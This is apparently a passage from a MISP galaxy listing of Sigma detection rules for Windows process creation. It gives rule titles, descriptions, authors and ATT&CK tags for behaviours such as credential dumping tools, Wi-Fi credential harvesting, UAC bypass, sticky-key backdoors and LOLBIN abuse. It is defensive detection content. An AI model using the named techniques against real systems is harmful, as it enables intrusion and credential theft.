filename proc_creation_win_powershell_user_discovery_get_aduser.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Potential Defense Evasion Via Rename Of Highly Relevant Binaries

Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName data point.

Internal MISP references

UUID 0ba1da6d-b6ce-4366-828c-18826c9de23e which can be used as unique global reference for Potential Defense Evasion Via Rename Of Highly Relevant Binaries in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113
creation_date 2019/06/15
falsepositive ['Custom applications use renamed binaries adding a slight change to the binary name. Typically this is easy to spot and add to a whitelist', "PsExec installed via the Windows Store doesn't contain the original filename field (false negative)"]
filename proc_creation_win_renamed_binary_highly_relevant.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003', 'car.2013-05-009']
Related clusters

To see the related clusters, click here.

HackTool - SafetyKatz Execution

Detects the execution of the hacktool SafetyKatz via PE information and its default Image name.

Internal MISP references

UUID b1876533-4ed5-4a83-90f3-b8645840a413 which can be used as unique global reference for HackTool - SafetyKatz Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/20
falsepositive ['Unlikely']
filename proc_creation_win_hktl_safetykatz.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Harvesting Of Wifi Credentials Via Netsh.EXE

Detects the harvesting of Wi-Fi credentials using netsh.exe.

Internal MISP references

UUID 42b1a5b8-353f-4f10-b256-39de4467faff which can be used as unique global reference for Harvesting Of Wifi Credentials Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), oscd.community
creation_date 2020/04/20
falsepositive ['Unknown']
filename proc_creation_win_netsh_wifi_credential_harvesting.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1040']
Related clusters

To see the related clusters, click here.

PUA - Advanced IP Scanner Execution

Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

Internal MISP references

UUID bef37fa2-f205-4a7b-b484-0759bfd5f86f which can be used as unique global reference for PUA - Advanced IP Scanner Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
creation_date 2020/05/12
falsepositive ['Legitimate administrative use']
filename proc_creation_win_pua_advanced_ip_scanner.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1046', 'attack.t1135']
Related clusters

To see the related clusters, click here.

IIS Native-Code Module Command Line Installation

Detects suspicious IIS native-code module installations via the command line.

Internal MISP references

UUID 9465ddf4-f9e4-4ebd-8d98-702df3a93239 which can be used as unique global reference for IIS Native-Code Module Command Line Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/11
falsepositive ['Unknown, as how admins install IIS modules may vary from organisation to organisation']
filename proc_creation_win_iis_appcmd_susp_module_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Rundll32 Activity

Detects suspicious execution of rundll32, with specific calls to DLLs with known LOLBIN functionality.

Internal MISP references

UUID e593cf51-88db-4ee1-b920-37e89012a3c9 which can be used as unique global reference for Potentially Suspicious Rundll32 Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_rundll32_susp_activity.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious SYSVOL Domain Group Policy Access

Detects access to Domain Group Policies stored in SYSVOL.

Internal MISP references

UUID 05f3c945-dcc8-4393-9f3d-af65077a8f86 which can be used as unique global reference for Suspicious SYSVOL Domain Group Policy Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Jonhnathan Ribeiro, oscd.community
creation_date 2018/04/09
falsepositive ['Administrative activity']
filename proc_creation_win_susp_sysvol_access.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Exports Critical Registry Keys To a File

Detects the export of a critical Registry key to a file.

Internal MISP references

UUID 82880171-b475-4201-b811-e9c826cd5eaa which can be used as unique global reference for Exports Critical Registry Keys To a File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/12
falsepositive ['Dumping hives for legitimate purposes, i.e. backup or forensic investigation']
filename proc_creation_win_regedit_export_critical_keys.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1012']
Related clusters

To see the related clusters, click here.

Wab/Wabmig Unusual Parent Or Child Processes

Detects unusual parent or child processes of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes, as seen being used in Bumblebee activity.

Internal MISP references

UUID 63d1ccc0-2a43-4f4b-9289-361b308991ff which can be used as unique global reference for Wab/Wabmig Unusual Parent Or Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename proc_creation_win_wab_unusual_parents.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

HackTool - Windows Credential Editor (WCE) Execution

Detects the use of Windows Credential Editor (WCE).

Internal MISP references

UUID 7aa7009a-28b9-4344-8c1f-159489a390df which can be used as unique global reference for HackTool - Windows Credential Editor (WCE) Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/31
falsepositive ['Another service that uses a single -s command line switch']
filename proc_creation_win_hktl_wce.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0005']

Suspicious ZipExec Execution

ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.

Internal MISP references

UUID 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132 which can be used as unique global reference for Suspicious ZipExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/07
falsepositive ['Unknown']
filename proc_creation_win_hktl_zipexec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']

Execute Code with Pester.bat as Parent

Detects code execution via Pester.bat (Pester is a PowerShell module for testing).

Internal MISP references

UUID 18988e1b-9087-4f8a-82fe-0414dce49878 which can be used as unique global reference for Execute Code with Pester.bat as Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/08/20
falsepositive ['Legitimate use of Pester for writing tests for Powershell scripts and modules']
filename proc_creation_win_lolbin_pester.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1216']

Explorer NOUACCHECK Flag

Detects suspicious starts of explorer.exe with the /NOUACCHECK flag, which allows all child processes of that newly started explorer.exe to run without any UAC checks.

Internal MISP references

UUID 534f2ef7-e8a2-4433-816d-c91bccde289b which can be used as unique global reference for Explorer NOUACCHECK Flag in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/23
falsepositive ['Domain Controller User Logon', 'Unknown how many legitimate software products use that method']
filename proc_creation_win_explorer_nouaccheck.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1548.002']

XBAP Execution From Uncommon Locations Via PresentationHost.EXE

Detects the execution of ".xbap" (Browser Application) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" payloads and bypass AWL.

Internal MISP references

UUID d22e2925-cfd8-463f-96f6-89cec9d9bc5f which can be used as unique global reference for XBAP Execution From Uncommon Locations Via PresentationHost.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/01
falsepositive ['Legitimate ".xbap" being executed via "PresentationHost"']
filename proc_creation_win_presentationhost_uncommon_location_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']

Set Suspicious Files as System Files Using Attrib.EXE

Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files, hiding them from users and making them impossible to delete with simple rights. The rule limits the search to specific extensions and directories to avoid false positives.

Internal MISP references

UUID efec536f-72e8-4656-8960-5e85d091345b which can be used as unique global reference for Set Suspicious Files as System Files Using Attrib.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_attrib_system_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']

User Added To Highly Privileged Group

Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".

Internal MISP references

UUID 10fb649c-3600-4d37-b1e6-56ea90bb7e09 which can be used as unique global reference for User Added To Highly Privileged Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/23
falsepositive ['Administrative activity that must be investigated']
filename proc_creation_win_susp_add_user_privileged_group.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1098']

Suspicious Debugger Registration Cmdline

Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).

Internal MISP references

UUID ae215552-081e-44c7-805f-be16f975c8a2 which can be used as unique global reference for Suspicious Debugger Registration Cmdline in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
creation_date 2019/09/06
falsepositive ['Unknown']
filename proc_creation_win_registry_install_reg_debugger_backdoor.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.008']

Potential Remote Desktop Tunneling

Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.

Internal MISP references

UUID 8a3038e8-9c9d-46f8-b184-66234a160f6f which can be used as unique global reference for Potential Remote Desktop Tunneling in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_susp_remote_desktop_tunneling.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021']

Potential Defense Evasion Via Binary Rename

Detects the execution of a renamed binary often used by attackers or malware, leveraging the newer Sysmon OriginalFileName data point.

Internal MISP references

UUID 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 which can be used as unique global reference for Potential Defense Evasion Via Binary Rename in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)
creation_date 2019/06/15
falsepositive ['Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist']
filename proc_creation_win_renamed_binary.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']

User Added to Remote Desktop Users Group

Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".

Internal MISP references

UUID ffa28e60-bdb1-46e0-9f82-05f7a61cc06e which can be used as unique global reference for User Added to Remote Desktop Users Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/06
falsepositive ['Administrative activity']
filename proc_creation_win_susp_add_user_remote_desktop_group.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.lateral_movement', 'attack.t1133', 'attack.t1136.001', 'attack.t1021.001']

Control Panel Items

Detects the malicious use of a control panel item.

Internal MISP references

UUID 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4 which can be used as unique global reference for Control Panel Items in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
creation_date 2020/06/22
falsepositive ['Unknown']
filename proc_creation_win_control_panel_item.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218.002', 'attack.persistence', 'attack.t1546']

Arbitrary MSI Download Via Devinit.EXE

Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system.

Internal MISP references

UUID 90d50722-0483-4065-8e35-57efaadd354d which can be used as unique global reference for Arbitrary MSI Download Via Devinit.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Unknown']
filename proc_creation_win_devinit_lolbin_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']

Suspicious AddinUtil.EXE CommandLine Execution

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.

Internal MISP references

UUID 631b22a4-70f4-4e2f-9ea8-42f84d9df6d8 which can be used as unique global reference for Suspicious AddinUtil.EXE CommandLine Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename proc_creation_win_addinutil_suspicious_cmdline.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Potential Persistence Via Microsoft Compatibility Appraiser

Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks, in order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.

Internal MISP references

UUID f548a603-c9f2-4c89-b511-b089f7e94549 which can be used as unique global reference for Potential Persistence Via Microsoft Compatibility Appraiser in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/09/29
falsepositive ['Unknown']
filename proc_creation_win_schtasks_persistence_windows_telemetry.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']

Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution

Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe, which can be used to execute any other binary.

Internal MISP references

UUID a20391f8-76fb-437b-abc0-dba2df1952c6 which can be used as unique global reference for Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Legitimate use by developers as part of NodeJS development with Visual Studio Tools']
filename proc_creation_win_pressanykey_lolbin_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']

Suspicious AgentExecutor PowerShell Execution

Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass", or any binary named "powershell.exe" located in the path provided by the 6th positional argument.

Internal MISP references

UUID c0b40568-b1e9-4b03-8d6c-b096da6da9ab which can be used as unique global reference for Suspicious AgentExecutor PowerShell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), memory-shards
creation_date 2022/12/24
falsepositive ['Unknown']
filename proc_creation_win_agentexecutor_susp_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Suspicious HWP Sub Processes

Detects suspicious Hangul Word Processor (Hanword) sub-processes that could indicate exploitation.

Internal MISP references

UUID 023394c4-29d5-46ab-92b8-6a534c6f447b which can be used as unique global reference for Suspicious HWP Sub Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/24
falsepositive ['Unknown']
filename proc_creation_win_hwp_exploits.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001', 'attack.execution', 'attack.t1203', 'attack.t1059.003', 'attack.g0032']

UAC Bypass via Windows Firewall Snap-In Hijack

Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in.

Internal MISP references

UUID e52cb31c-10ed-4aea-bcb7-593c9f4a315b which can be used as unique global reference for UAC Bypass via Windows Firewall Snap-In Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']

Suspicious Query of MachineGUID

Detects the use of reg to query the MachineGuid value.

Internal MISP references

UUID f5240972-3938-4e56-8e4b-e33893176c1f which can be used as unique global reference for Suspicious Query of MachineGUID in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_reg_machineguid.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']

InfDefaultInstall.exe .inf Execution

Detects execution of an SCT script via scrobj.dll from a command entered into a specially prepared INF file.

Internal MISP references

UUID ce7cf472-6fcc-490a-9481-3786840b5d9b which can be used as unique global reference for InfDefaultInstall.exe .inf Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/13
falsepositive ['Unknown']
filename proc_creation_win_infdefaultinstall_execute_sct_scripts.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Windows Share Mount Via Net.EXE

Detects when a share is mounted using the "net.exe" utility.

Internal MISP references

UUID f117933c-980c-4f78-b384-e3d838111165 which can be used as unique global reference for Windows Share Mount Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/02
falsepositive ['Legitimate activity by administrators and scripts']
filename proc_creation_win_net_use_mount_share.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']

Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Detects potentially suspicious execution of the Regasm/Regsvcs utilities from an uncommon location.

Internal MISP references

UUID cc368ed0-2411-45dc-a222-510ace303cb2 which can be used as unique global reference for Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/25
falsepositive ['Unknown']
filename proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.009']

DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to load the target DLL file.

Internal MISP references

UUID 242301bc-f92f-4476-8718-78004a6efd9f which can be used as unique global reference for DLL Loaded via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/23
falsepositive ['Unknown']
filename proc_creation_win_certoc_load_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

New Virtual Smart Card Created Via TpmVscMgr.EXE

Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.

Internal MISP references

UUID c633622e-cab9-4eaa-bb13-66a1d68b3e47 which can be used as unique global reference for New Virtual Smart Card Created Via TpmVscMgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/15
falsepositive ['Legitimate usage by an administrator']
filename proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

WinDbg/CDB LOLBIN Usage

Detects usage of "cdb.exe" to launch 64-bit shellcode, or arbitrary processes or commands, from a debugger script file.

Internal MISP references

UUID b5c7395f-e501-4a08-94d4-57fe7a9da9d2 which can be used as unique global reference for WinDbg/CDB LOLBIN Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community, Nasreddine Bencherchali
creation_date 2019/10/26
falsepositive ['Legitimate use of debugging tools']
filename proc_creation_win_lolbin_cdb.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1106', 'attack.defense_evasion', 'attack.t1218', 'attack.t1127']

Regsvr32 DLL Execution With Uncommon Extension

Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.

Internal MISP references

UUID 50919691-7302-437f-8e10-1fe088afa145 which can be used as unique global reference for Regsvr32 DLL Execution With Uncommon Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/07/17
falsepositive ['Other legitimate extensions currently not in the list either from third party or specific Windows components.']
filename proc_creation_win_regsvr32_uncommon_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574', 'attack.execution']

HackTool - Htran/NATBypass Execution

Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass).

Internal MISP references

UUID f5e3b62f-e577-4e59-931e-0a15b2b94e1e which can be used as unique global reference for HackTool - Htran/NATBypass Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/12/27
falsepositive ['Unknown']
filename proc_creation_win_hktl_htran_or_natbypass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090', 'attack.s0040']

PUA - NirCmd Execution

Detects the use of the NirCmd tool for command execution, which could also be the result of legitimate administrative activity.

Internal MISP references

UUID 4e2ed651-1906-4a59-a78a-18220fca1b22 which can be used as unique global reference for PUA - NirCmd Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_nircmd.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']

Renamed SysInternals DebugView Execution

Detects suspicious execution of a renamed SysInternals DebugView binary.

Internal MISP references

UUID cd764533-2e07-40d6-a718-cfeec7f2da7f which can be used as unique global reference for Renamed SysInternals DebugView Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/05/28
falsepositive ['Unknown']
filename proc_creation_win_renamed_sysinternals_debugview.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']

Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension

Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.

Internal MISP references

UUID e9f8f8cc-07cc-4e81-b724-f387db9175e4 which can be used as unique global reference for Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/13
falsepositive ['Unknown']
filename proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.009']

Uncommon Child Process Of Conhost.EXE

Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.

Internal MISP references

UUID 7dc2dedd-7603-461a-bc13-15803d132355 which can be used as unique global reference for Uncommon Child Process Of Conhost.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020/10/25
falsepositive ['Unknown']
filename proc_creation_win_conhost_susp_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']

Suspicious Rundll32 Invoking Inline VBScript

Detects a suspicious rundll32 process whose command line invokes inline VBScript, as seen being used by UNC2452.

Internal MISP references

UUID 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd which can be used as unique global reference for Suspicious Rundll32 Invoking Inline VBScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/05
falsepositive ['Unknown']
filename proc_creation_win_rundll32_inline_vbs.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']

Compress Data and Lock With Password for Exfiltration With WINZIP

An adversary may compress or encrypt collected data prior to exfiltration using third-party utilities.

Internal MISP references

UUID e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d which can be used as unique global reference for Compress Data and Lock With Password for Exfiltration With WINZIP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/27
falsepositive ['Unknown']
filename proc_creation_win_winzip_password_compression.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']

Use of W32tm as Timer

When configured with suitable command line arguments, w32tm can act as a delay mechanism.

Internal MISP references

UUID 6da2c9f5-7c53-401b-aacb-92c040ce1215 which can be used as unique global reference for Use of W32tm as Timer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/25
falsepositive ['Legitimate use']
filename proc_creation_win_w32tm.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1124']

Potential Provisioning Registry Key Abuse For Binary Proxy Execution

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

Internal MISP references

UUID 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 which can be used as unique global reference for Potential Provisioning Registry Key Abuse For Binary Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023/08/08
falsepositive ['Unknown']
filename proc_creation_win_registry_provlaunch_provisioning_command.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

File Download From IP Based URL Via CertOC.EXE

Detects when a user downloads a file from an IP-based URL using CertOC.exe.

Internal MISP references

UUID b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a which can be used as unique global reference for File Download From IP Based URL Via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/18
falsepositive ['Unknown']
filename proc_creation_win_certoc_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.execution', 'attack.t1105']

Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 which can be used as unique global reference for Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/20
falsepositive ['Unknown']
filename proc_creation_win_powershell_zip_compress.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1074.001']

Greedy File Deletion Using Del

Detects execution of the "del" builtin command to remove files using a greedy/wildcard expression. This is often used by malware to delete the contents of folders that may contain the initial infection files, or to delete evidence.

Internal MISP references

UUID 204b17ae-4007-471b-917b-b917b315c5db which can be used as unique global reference for Greedy File Deletion Using Del in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, X__Junior (Nextron Systems)
creation_date 2021/12/02
falsepositive ['Unknown']
filename proc_creation_win_cmd_del_greedy_deletion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']

Potential Recon Activity Using DriverQuery.EXE

Detects usage of the "driverquery" utility to perform reconnaissance on installed drivers.

Internal MISP references

UUID 9fc3072c-dc8f-4bf7-b231-18950000fadd which can be used as unique global reference for Potential Recon Activity Using DriverQuery.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/19
falsepositive ['Legitimate usage by some scripts might trigger this as well']
filename proc_creation_win_driverquery_recon.yml
level high
logsource.category process_creation
logsource.product windows
